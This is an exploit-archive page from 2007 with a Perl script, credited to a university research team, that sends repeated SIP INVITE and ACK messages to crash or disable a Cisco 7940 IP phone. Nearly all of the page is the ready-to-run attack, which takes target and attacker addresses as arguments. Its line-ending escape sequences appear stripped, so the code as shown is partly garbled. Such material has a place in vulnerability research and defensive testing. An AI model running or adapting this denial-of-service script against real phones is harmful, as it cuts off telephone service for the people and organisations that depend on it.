Cisco Phone 7940 Remote Denial of Service Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Cisco Phone 7940 Remote Denial of Service Exploit
# Published : 2007-12-05
# Author : MADYNES
# Previous Title : Simple HTTPD <= 1.41 (/aux) Remote Denial of Service Exploit
# Next Title : VLC 0.86 < 0.86d ActiveX Remote Bad Pointer Initialization PoC

#!/usr/bin/perl
 

###############################
# Vulnerabily discovered using KiF ~ Kiph
#
# Authors:
# Humberto J. Abdelnur (Ph.D Student)
# Radu State (Ph.D)
# Olivier Festor (Ph.D)
#
# Madynes Team, LORIA - INRIA Lorraine
# http://madynes.loria.fr
############################### 
use IO::Socket::INET;
use String::Random; 
die "Usage $0 <targetIP> <targetUser> <attackerIP> <attackerUser>"
unless ($ARGV[3]); 
$targetUser = $ARGV[1];
$targetIP = $ARGV[0]; 
$attackerUser = $ARGV[3];
$attackerIP= $ARGV[2]; 
$socket=new IO::Socket::INET->new(
Proto=>'udp',
PeerPort=>5060,
PeerAddr=>$targetIP,
LocalPort=>5060); 
$foo = new String::Random; 
$flag = 0;
@calls;
$threads = 0; 
while ($flag == 0){
$callid= " " . $foo->randpattern("CCCnccnC") ."@$attackerIP";
$cseq = $foo->randregex('dddd'); 
$msg = "INVITE sip:$targetIP SIP/2.0r
Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1r
From: <sip:$attackerUser@$attackerIP>;tag=1r
To: <sip:$targetUser@$targetIP>r
Call-ID:$callidr
CSeq: $cseq INVITEr
Max-Forwards: 70r
Contact: <sip:$attackerUser@$attackerIP>r
Allow: INVITE, ACK, CANCEL, BYE, OPTIONS, REFER, SUBSCRIBE, NOTIFY,
MESSAGEr
Content-Length: 0r
r
";
$socket->send($msg); 
$socket->recv($text,1024,0);
if ($text =~ /^SIP/2.0 100(.rn)*/ ){
push(@calls, $callid);
sleep(1);
}elsif ($text =~ /^SIP/2.0 486(.rn)*/ ){
if ($thread == 0){
$thread = scalar(@calls);
}
while (scalar(@calls) ge $thread){
$toTag = $cseq= $callid= $text;
$toTag =~ s/^(.*rn)*(To|t):(.*?>)(;.*?)?rn(.*rn)*/4/;

$callid =~ s/^(.*rn)*Call-ID:(.*)rn(.*rn)*/2/;
$cseq =~ s/^(.*rn)*CSeq: (.*?) (.*?)rn(.*rn)*/2/; 
$msg = "ACK sip:$targetIP SIP/2.0r
Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1r
From: <sip:$attackerUser@$attackerIP>;tag=1r
To: <sip:$targetUser@$targetIP>$toTagr
Call-ID:$callidr
CSeq: $cseq ACKr
Contact: <sip:$attackerUser@$attackerIP>r
Content-Length: 0r
r
";
$socket->send($msg);
$i= 0;
while ($i < scalar(@calls)){
if (@calls[$i] eq $callid){
delete @calls[$i];
}else{
$i += 1;
}
}
if (scalar(@calls) ge $thread){
$socket->recv($text,1024,0);
}
}
}
}

# www.Syue.com [2007-12-05]